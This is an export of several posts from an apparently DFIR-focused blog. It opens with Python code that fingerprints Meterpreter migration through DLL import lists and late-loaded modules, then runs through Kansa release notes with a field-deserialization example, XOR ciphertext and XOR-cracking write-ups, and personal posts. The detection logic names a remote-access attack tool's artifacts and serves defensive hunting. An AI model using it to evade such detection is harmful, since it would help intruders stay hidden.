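    3040: ("notepad.exe", ["ntdll.dll", "KERNEL32.dll", "USER32.dll"]),
}


if __name__ == "__main__":
    name, imports = parse_memdumppe(STDAPI_DUMP)
    print(name, "imports", sorted(imports))
    print("overlap with late loads:",
          late_loaded_overlap(STDAPI_DUMP, LATE_LOADED_SPOOLSV))
    print("still unexplained:",
          unexplained_late_loads([STDAPI_DUMP], LATE_LOADED_SPOOLSV))
    print("processes to look at:", processes_with_modules(SAMPLE_PROCESSES))
```

Feeding the metsrv and priv listings into `unexplained_late_loads` alongside the stdapi one is what would shrink the leftover set to the single unaccounted module the text mentions; the process check is the same idea turned around, starting from the module set and asking which processes carry it.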
It's incumbent upon us as defenders, hunters, investigators and insatiably curious types to test and testify to our test results.</font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Fortunately, though attackers be sneaky and creative, diligent defenders can build detections around late-loading dlls or <a href="https://github.com/davehull/Kansa/blob/master/Modules/Process/Get-ProcessesUsingModules.ps1" target="_blank">hunt for specific sets of dlls associated</a> with malicious agent migrations.</font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">In future posts, I'd like to explore Truncer's framework and see if Volatility can pull back its veil. That was bad. I'm sorry. I'd also like to dive deeper into the byte array and explain what's happening there.</font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">I want to encourage you to take a look at </font><font face="courier">memtriage</font><font face="inherit">. 
I don't hear much chatter about it, but I think it's a game changer enabling more rapid response.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><h3 style="text-align: left; text-indent: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font><a href="https://trustedsignal.blogspot.com/2020/07/analyzing-instance-of-meterpreters.html" target="_blank"><font face="inherit"><span style="font-weight: 400;">Next Up: </span></font><span style="font-weight: 400;">Amateur</span><font face="inherit"><span style="font-weight: 400;"> hour analysis of the shellcode shown above</span></font></a></font></span></h3><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: 
no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-26194592280301847082020-06-11T21:33:00.002-07:002020-06-12T07:50:47.726-07:00The last 1717 days<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">I mentioned on LinkedIn yesterday that I'm looking for a new role. For recruiters and interested parties, I thought I should provide some background about what I've been doing for the last four and a half years.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">I left Microsoft back in September of 2015. It was a difficult decision. I worked with and "against" brilliant people on really interesting problems. It was one of the most challenging and rewarding jobs I've ever had.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">I left to join Tanium, a company that I'd never heard of at the time. A friend of mine who I'd known through Microsoft reached out to me about it. His claims about what Tanium could do were hard to believe. He said it could pull a list of running processes with their hashes, data about network connections, information about files on disk, installed software, logged in users, etc. from hundreds of thousands of systems across multiple platforms in seconds. </span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">According to my friend, Tanium could execute changes on those systems just as fast and it could do all of this with very little infrastructure. We would find out later through the work of a brilliant engineer that the architecture could scale to more than one million endpoints managed by a single server -- a beefy server, to be sure, but not 100 servers or 50. One.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">The scalability of the platform meant that security and operations teams could be more agile. They wouldn't need a team of engineers focused on maintaining a fleet of servers, instead those engineers could focus on hunting, investigating, responding to incidents, patching, running vulnerability scans, etc.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Having worked with other commercial products and having built my own tooling to perform incident response tasks, I was skeptical. How had a company I'd never heard of conquered this hill that so many products had died on?</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">We talked off and on for a few weeks. I spoke with a seemingly endless list of different people from Tanium and we agreed there was alignment of my interests and their objectives. I joined the company.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">During my time at Tanium I contributed code to extend the security incident response capabilities of the platform. Alongside others, I developed and delivered training. I became a "player / coach" on a team with deep experience in DFIR work. We had former Feds, Mandiant, Cylance and professionals from industry in our ranks. We helped our customers understand what the platform could and could not do. We won their confidence and trust.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">We helped customers respond to security incidents. When information on 0days came to light, we worked with engineers across the entire company to determine if we had existing capabilities to address those issues and if not, we rapidly put together new content to help investigate and mitigate. In the days of WannaCry, it was incredibly satisfying to work with customers to mitigate the SMBv1 vulnerability across hundreds of thousands of endpoints in their networks in seconds -- not minutes, days or weeks.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tanium is not a perfect product. No perfect product exists, but over the last four and a half years product managers, developers and engineers have worked tirelessly to make it better and better. If I were a CIO or a CISO in a large enterprise, Tanium would be on my short list of must have tools. I say all of this as someone who is effectively an ex-Tanium employee. I still have a few days left and in full-disclosure, I own stock in the company, but even if I could sell all of my stock today and my position was terminated effective immediately, Tanium would be on my list. There may be better niche products for some specific problems (for now), but there is nothing on the market that is as flexible and as scalable as Tanium and in the enterprise, flexibility and scalability are a winning combination for tackling all kinds of unforeseen problems.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Why leave? And especially why leave during a global pandemic, the worst unemployment since the Great Depression, a time of massive civil unrest, with a mortgage and multiple college tuitions to cover? I left because it was time. It was time for me to move on to new challenges and new personal growth and in so doing, I hope I have provided opportunities for growth for those I left behind.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Godspeed former colleagues.</span></font></div>
davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-86393370430159110132019-04-28T20:34:00.002-07:002019-04-28T20:34:35.287-07:00Ode to Kasiski<span style="font-family: inherit;"><span style="font-size: small;">00101110 00000000 00000110 00001101 00000011 00011000 00001101 01010100 00001000 00001101 00010010<br />00000001 00011000 00000111 00000001 00010110 01001101 00001110 00010010 01001001 00010111 00011011<br />00001000 01000001 00010111 00000001 00010101 00000101 00000100 00000110 01001001 00010111 00010110<br />00010101 00010101 01010100 00000001 00001011 01001101 00010101 00011100 00000000 00010000 01010011<br />00011101 00001110 00000111 00011100 01000101 00001110 00000000 00011010 01001001 00001111 00010110<br />00001100 00000101 01010100 00000111 00001011 00001000 01000001 00000000 00000110 01000011 00010101<br />00000100 00010011 00000111 00011100 01000101 00001001 00000100 00000000 00001100 00010001 00011110<br />00000100 00001111 00010001 01001000 00010001 00000101 00000100 01010100 00000101 00000110 00011101<br />00001010 00010101 00011100 01001000 00001010 00001011 01000001 00000000 00000001 00000110 01010011<br />00000110 00000100 00001101 01001000 00010001 00000101 00000000 00000000 01001001 00010100 00010010<br />00011110 01000001 00000001 00011011 00000000 00001001 01000001 00000000 00000110 01000011 01010001<br />00001000 00001111 00010111 00011010 00011100 00011101 00010101 01010110 01001001 00001010 00000111<br />01000011 01000001 00111011 00000110 00000110 00001000 01000001 00000000 00000001 00000110 01010011<br />00000110 00000100 00001101 01001000 00001001 00001000 00001111 00010011 00011101 00001011 01010011<br />00000100 00010010 01010100 00000011 00001011 00000010 00010110 00011010 01000101 01000011 00011010<br />00011001 01000001 00011101 00011011 01000101 00011111 00000100 00011000 00001000 00010111 00011010<br />00011011 00000100 00011000 00010001 01000101 
00011110 00001000 00011001 00011001 00001111 00010110<br />01001101 00010101 00011011 01001000 00000111 00011111 00010100 00000000 00001100 00000101 00011100<br />00011111 00000010 00010001 01001000 00010001 00000101 00000100 01010100 00000010 00000110 00001010<br />01001101 00001000 00000000 00011011 00000000 00000001 00000111 01010100 00001000 00001101 00010111<br />01001101 00000101 00010001 00011010 00001100 00011011 00000100 01010100 00011101 00001011 00010110<br />01001101 00001110 00000110 00000001 00000010 00000100 00001111 00010101 00000101 01000011 00010000<br />00000001 00000100 00010101 00011010 01000101 00011001 00000100 00001100 00011101 01000011 00010101<br />00011111 00001110 00011001 01001000 00010001 00000101 00000100 01010100 00001010 00001010 00000011<br />00000101 00000100 00000110 01001000 00010001 00001000 00011001 00000000 01000111</span></span>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-42036686998339960442019-04-19T05:46:00.002-07:002020-08-04T20:57:59.094-07:00We've always done it this wayI was recently reminded of Rear Admiral Grace Hopper's remark:<br />
<blockquote class="tr_bq">
<span style="font-size: large;">The most damaging phrase in the language is “We’ve always done it this way!”</span></blockquote>
When I was in high school I was a lifeguard at a waterpark with a wave pool, water slides, a cave with a waterfall, a pair of monorails side-by-side and a toddler pool. There were plenty of hazards. It was a big bustling park.<br />
<br />
While working there I had dozens of "saves." Usually at the wave pool, where someone would get in too deep without good swimming skills. The waves would turn on and poor swimmers would find themselves in real trouble. Saving someone in the wave pool meant hitting the big red button on the guard stand to stop the wave machine, jumping in the water and navigating the crowd to get to the victim with rescue buoy in tow -- when working the wave pool, wearing the buoy was required. Depending on the victim's condition, a cross-chest carry to shallow water was sometimes necessary, but more commonly extending the rescue buoy was sufficient to help them recover.<br />
<br />
When I went away to college I applied for a lifeguard position at the university pool. At that point I had years of experience. I'd been a good competitive swimmer in high school and thought I had a good chance at getting the job.<br />
<br />
There was a rescue test before the interview. We went two at a time. I was in the first group. The pool was split into two lanes. Candidates stood at one end and current lifeguards were waiting in the water at the other. On the instruction of the pool manager we were to save the victims at the other end.<br />
<br />
I reacted to the situation with what I knew. I quickly put on the rescue buoy tether, dove in the water and swam with my head up, eyes on the victim, to the other end of the pool where I extended the buoy. The victim grabbed it, I towed him to the side of the pool, helped him from the water and made sure he was ok. I was so focused on my rescue that I didn't see how the other person's rescue went. I felt confident about my effort. I'd arrived at my victim quickly, and had performed a saving motion that I'd performed many times before.<br />
<br />
I took a seat in the bleachers to watch the next pair perform the exercise. When the lifeguards started flailing again, one of the candidates dove in and started swimming to the other end of the pool, but the other candidate didn't. Instead, she ran to the rescue hook hanging on the wall off to one side of the pool, grabbed the pole and hook, then ran to her victim and extended the pole. Her victim grabbed the hook and she pulled him to the side of the pool and helped him out.<br />
<br />
When we were finished with the exercise, the pool manager came over and said,<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: large;">"Everyone who got in the water to save their victim can go home, you're not going on to the next round."</span></blockquote>
<br />
Some of us were shocked. We had demonstrated that we could quickly react, that we could swim the length of the pool, that we knew how to use the rescue buoys, etc. Before anyone could ask why we were being sent home, the manager added,<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: large;">"When you got in the water to save your victims, you took unnecessary risks and increased the likelihood that two people would drown. Never get in the water to do what can be done safely from outside the water."</span></blockquote>
<br />
He wasn't wrong. It's one of the first lessons learned in lifeguard training, but my experience working in the waterpark conditioned me to operate differently.<br />
<br />
<br />
The memory of that experience recently returned to me. I was working a problem purely for the sake of working it when I realized my approach was wrong and the only reason I was working it that way was because I'd done it that way many times before, but always in the heat of an incident, working under pressure.<br />
<br />
Postmortems are a standard part of the post-incident process. We often review what went wrong and how it may be prevented in the future, but we don't always ask questions about the investigative and recovery processes and how they could be optimized.<br />
<br />
I recently started reading Daniel Kahneman's book, <u>Thinking, Fast and Slow</u>. It's a fascinating read. Kahneman proposes that we are of two minds, <i>System 1 and System 2</i> as he calls them. System 1 is our default mode of thinking, the kind we use when we react to something -- a loud noise, the look on someone's face. System 2 is the kind of thinking we use to solve problems that require focus and concentration -- 17 x 24, for example.<br />
<br />
<b>With enough practice and familiarity System 2 thinking can become System 1 thinking</b>. A chess grand master can look at positions on a board and recognize what the next best move is simply based on years of experience and pattern recognition whereas a novice player would have to engage System 2 and carefully weigh the options.<br />
<br />
My experience at the wave pool conditioned me to respond a certain way. There was no rescue hook that could reach the middle of the wave pool. Saving struggling swimmers required getting wet, but the pool manager at university was absolutely right that for the circumstances in his pool getting wet was the wrong approach except under specific circumstances (i.e. a body on the bottom of the pool).<br />
<br />
When you're working through a task or have completed it, it may be worth taking time to examine your approach. Is it the optimum method, or are you doing things the way you've always done them?davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-61448218788110350892015-08-14T10:56:00.000-07:002015-08-14T11:23:06.107-07:00Kansa's Stafford release: More capable, more forensically sound, more flexibleOver the last few months significant changes have been pushed to Kansa's <em>next</em> branch. Those changes were very recently pushed to master, then packaged into the <a href="https://github.com/davehull/Kansa/releases/tag/v0.8438-beta" target="_blank">Stafford release.</a> I mentioned in the release notes that I would have a longer post here about the changes. There have been more than 130 commits since the previous release; I won't cover all of them, but let's hit the major changes.<br />
<br />
Kansa.ps1 has a handful of new parameters and command line switches:<br />
<br />
<strong>-OutputFormat</strong><br />
This is an optional parameter that takes an argument specifying the format for Kansa's output. Those familiar with Kansa know that individual collectors used to specify their own output format. Some collectors would return CSV, some would return CLIXML, some would return binary data. Now all collectors return data in a common format with CSV being the default. Valid arguments to -OutputFormat are CSV, <em>JSON</em>, TSV and XML. With the exception of JSON, all of these were previously supported. Support for binary and zip formats has been removed.<br />
<br />
You may be wondering how Kansa returns binary data, since it can be used to collect arbitrary files and memory dumps. In previous releases, those data types were returned as binary files. With the Stafford release, those data elements are serialized and stored as object properties; those objects are then returned and stored as CSV or whatever output you specify. So a binary file is now a serialized property on an object: the gzipped bytes of the original binary file, base64 encoded.<br />
<br />
Obviously you need a way to deserialize this data in order to analyze it. There's a new analysis script for this in Analysis\Deserialize-KansaField.ps1. More details on this in a later post.<br />
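To make the order of operations concrete, here is an added example in Python. It is not Kansa's Deserialize-KansaField.ps1 and nothing in it comes from the Kansa code base; it assumes only what the release notes describe, a file's bytes gzipped, then base64 encoded, then stored as a string property that lands in a CSV column. The column names Path, SHA256 and Content, the sample rows and the "file" contents are constructed for the demo, and the hash column is an assumption about what a collector might record beside the payload, not a statement about Kansa's modules. Recovering the bytes means reversing the two steps in the opposite order, and comparing the result with a recorded hash is the cheap way to catch a field that was truncated or edited before it reached the analyst.<br />

```python
"""Round-trip a Kansa-style serialized binary field (gzip, then base64, then
a string in a CSV column). Added example in Python, not Kansa's own
Deserialize-KansaField.ps1; column names and sample rows are constructed."""
import base64
import csv
import gzip
import hashlib
import io


def serialize_field(data: bytes) -> str:
    """gzip the raw bytes first, then base64 the compressed stream."""
    return base64.b64encode(gzip.compress(data)).decode("ascii")


def deserialize_field(text: str) -> bytes:
    """Undo serialize_field: base64-decode, then gunzip. The order matters;
    gunzipping the base64 text or base64-decoding the gzip bytes both fail."""
    return gzip.decompress(base64.b64decode(text, validate=True))


def recover_files(csv_text: str, field: str = "Content",
                  hash_field: str = "SHA256") -> list:
    """Pull every serialized file out of a CSV export and compare it with the
    hash recorded beside it (assumed column), so a truncated or edited field
    is flagged instead of being analysed as if it were the evidence."""
    recovered = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        data = deserialize_field(row[field])
        digest = hashlib.sha256(data).hexdigest()
        recovered.append({
            "path": row["Path"],
            "size": len(data),
            "bytes": data,
            "hash_ok": digest == row[hash_field].lower(),
        })
    return recovered


# Constructed sample export: two fake "files" (not real binaries). The second
# row carries a deliberately wrong hash so the integrity check visibly fires.
GOOD_BYTES = b"MZ\x90\x00" + bytes(range(256)) * 4
ODD_BYTES = b"#!/bin/sh\necho constructed sample\n"


def build_sample_csv() -> str:
    """Write the constructed rows the way a CSV export would carry them."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["Path", "SHA256", "Content"])
    writer.writerow([r"C:\Windows\Temp\dropper.bin",
                     hashlib.sha256(GOOD_BYTES).hexdigest(),
                     serialize_field(GOOD_BYTES)])
    writer.writerow([r"C:\Users\Public\run.sh",
                     hashlib.sha256(b"not the same bytes").hexdigest(),
                     serialize_field(ODD_BYTES)])
    return buf.getvalue()


def demo() -> list:
    """Recover both rows from the constructed export."""
    return recover_files(build_sample_csv())


if __name__ == "__main__":
    for item in demo():
        print(f"{item['path']}: {item['size']} bytes, hash ok = {item['hash_ok']}")
```

Run it as a script to see one row recover cleanly and the other fail its hash check. Keep the recovered bytes in memory or write them to an analysis box, not back to the host they came from; the whole point of the serialized format is that nothing touches the target's disk.<br />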
<div style="text-align: left;">
</div>
<br />
<strong>-JSONDepth:</strong><br />
Another optional parameter that takes an int32 argument. Because we've added support for JSON, we had to add a parameter for specifying how deeply nested objects are serialized; PowerShell's ConvertTo-Json stops at a depth of 2 by default and reduces anything nested below that to its string representation, which is useless for analysis. The default for Kansa is 10, which is sufficient for most collectors, but if you need to go deeper, you can.<br />
<br />
<strong>-UseSSL:</strong><br />
If this optional switch is present, Kansa.ps1 will call New-PSSession with the -UseSSL switch and remote sessions will run over TLS via WinRM's HTTPS listener (port 5986 by default) rather than the HTTP listener on 5985, <strong>iff</strong> you've done the legwork to issue certificates to your hosts and configure HTTPS listeners on them. More on this in a later post.<br />
<br />
<strong>-Authentication:</strong><br />
Previous releases of Kansa only supported Kerberos (non-delegated, network) authentication. That is the safest mechanism if you're concerned about credential theft when running investigations across large numbers of hosts, and you should be: with Kerberos the remote host receives a service ticket good only for itself, not credentials an attacker sitting on that host could reuse elsewhere. The trouble with only supporting Kerberos is that Kansa could not work in many scenarios, like authenticating with a local administrator account when you either don't want to use a forest admin credential or you're investigating a machine that is not domain joined.<br />
<br />
-Authentication is an optional parameter; acceptable arguments are "Basic", "CredSSP", "Default", "Digest", "Kerberos", "Negotiate" and "NegotiateWithImplicitCredential". Remember, some of these put your credentials at risk of harvesting by attackers: CredSSP delegates your full credentials to the remote host and Basic hands it your password, so if the box you're investigating is already compromised, so is the account you used. Reserve those options for hosts you have reason to trust, and use an account that has no rights anywhere else. The default is still Kerberos.<br />
<br />
<strong>-Port:</strong><br />
And finally, for those running PowerShell remoting endpoints on alternate ports, you can use this optional parameter to specify the remote management port on the remote host(s); WinRM's defaults are 5985 for HTTP and 5986 for HTTPS.<br />
<br />
The first change above, related to Kansa's output, makes the framework more forensically sound because we've eliminated a few cases where Kansa would previously write data to disk on remote hosts, potentially overwriting deleted data on those systems.<br />
<br />
The second set of changes, relating to authentication and transport make the framework more capable for non-domain scenarios. One thing I can now do with the framework that I couldn't do before is run it against Azure VMs to collect data from the cloud... fluffy, fluffy clouds.<br />
<br />
There are lots of other changes in Stafford as well, and not all of them were committed by me. <a href="https://twitter.com/z4ns4tsu" target="_blank">@z4ns4tsu</a> made significant contributions to this release, including Modules\Disk\Get-MasterFileTable.ps1, a tool for parsing the MFT from target systems. Because it reads the volume through the Win32 device namespace (the \\.\C: form of a path rather than C:\) it bypasses file locks, attributes and access control lists; raw volume access does require the collector to run with local administrator rights on the target.<br />
<br />
<a href="https://twitter.com/JValdezjr1" target="_blank">@JValdezjr1</a> also contributed changes, including some code in kansa.ps1 that will save target lists to a file when Kansa builds the target list dynamically by querying AD for the list of hosts in the domain.<br />
<br />
Kansa is maturing and this release is the most capable version yet. Please give it a try. I'm the primary developer, so I'm sure there are bugs; if you run into problems, open an issue at <a href="https://github.com/davehull/Kansa/issues">https://github.com/davehull/Kansa/issues</a> and let me know what you're encountering.<br />
<br />
I'll be following up in a few days with a post that demonstrates some of the new features in this release.<br />
<br />
Happy hunting!davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-80474319598520358462015-07-11T00:33:00.000-07:002015-07-11T14:12:10.252-07:00Cracking repeating XOR key cryptoMy last post here, <a href="http://trustedsignal.blogspot.com/2015/06/xord-play-normalized-hamming-distance.html">XOR'd play: Normalized Hamming Distance,</a> was a lengthy bit about the reliability of Normalized Hamming Distance to determine the size of a repeating XOR key that was used to encrypt a string of text and was based on my experience working on the Matasano Crypto Challenges at <a href="http://cryptopals.com/">cryptopals.com</a>. <br />
<br />
After a few weeks of focusing on other things, I returned to that effort and finished problem six from challenge set one, which says to use Normalized Hamming Distance to determine the probable key size and then use English letter frequency analysis to determine the probable bytes that make up the key. That's the short version.<br />
<br />
The script I wrote for the challenge applies some extra math to the problem of determining key size, because I found normalized Hamming Distance alone to not be very reliable. However, even with the extra math, the problem is still one of probability, not certainty. If you have no idea about the key size, the problem is even more expansive, though not completely open ended: if it's a repeating key, it can be no more than half the size of the encrypted byte stream.<br />
<br />
Let's look at an example. Below I have already populated two variables, $plaintext and $key and am using <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Encrypt.ps1">XOR-Encrypt.ps1</a> to encrypt the $plaintext value with the $key and return a base64 encoded string. In the second command, I'm populating the $ciphertext variable with that base64 encoded string.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFy6rzpfg-3bG7Kt_oq7NYyqfiZIpr0fs4g6KmFAZF2CFFgLzcXHEsL8UiJJ3HT-HrXWADsOxGt6dxGmx7Ylu9GzPmTzKIFb37mlJo1pbf9NrB51SICA0Vxubph5-EkVQ2_Tutz-uyjJc/s1600/XOR-Encrypt.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFy6rzpfg-3bG7Kt_oq7NYyqfiZIpr0fs4g6KmFAZF2CFFgLzcXHEsL8UiJJ3HT-HrXWADsOxGt6dxGmx7Ylu9GzPmTzKIFb37mlJo1pbf9NrB51SICA0Vxubph5-EkVQ2_Tutz-uyjJc/s640/XOR-Encrypt.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to enlarge</td></tr>
</tbody></table>
Now that we have a string of plaintext encrypted with a repeating XOR key, let's try cracking it.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz5GkJZCRGgLYjgYcXW_eMO7g84Kg0MG9Qu5FenBrygUPMDqT3byiDQgMsF2A4SSYqiMd-0BSkf5GXmpTieufEtKq7W6zdV8vsyqF2yvIT5NbNMIAaGc-pz7i6IRPRb8FcliXvMqNZmr0/s1600/Crack1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz5GkJZCRGgLYjgYcXW_eMO7g84Kg0MG9Qu5FenBrygUPMDqT3byiDQgMsF2A4SSYqiMd-0BSkf5GXmpTieufEtKq7W6zdV8vsyqF2yvIT5NbNMIAaGc-pz7i6IRPRb8FcliXvMqNZmr0/s640/Crack1.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to enlarge</td></tr>
</tbody></table>
In the screenshot above, I've run the <a href="https://github.com/davehull/MCC/blob/master/sets/1/Crack-XORRepeatingKeyCrypto.ps1">Crack-XORRepeatingKeyCrypto.ps1</a> script with about the minimum set of command line parameters. The VERBOSE output line tells me that I didn't provide a MaxKeySize value, so the script has calculated the number of bytes in the ciphertext and has set the MaxKeySize to half of that value. If we're dealing with repeating key XOR crypto, the key must be at most half the size of the ciphertext, otherwise the key can't repeat (completely).<br />
<br />
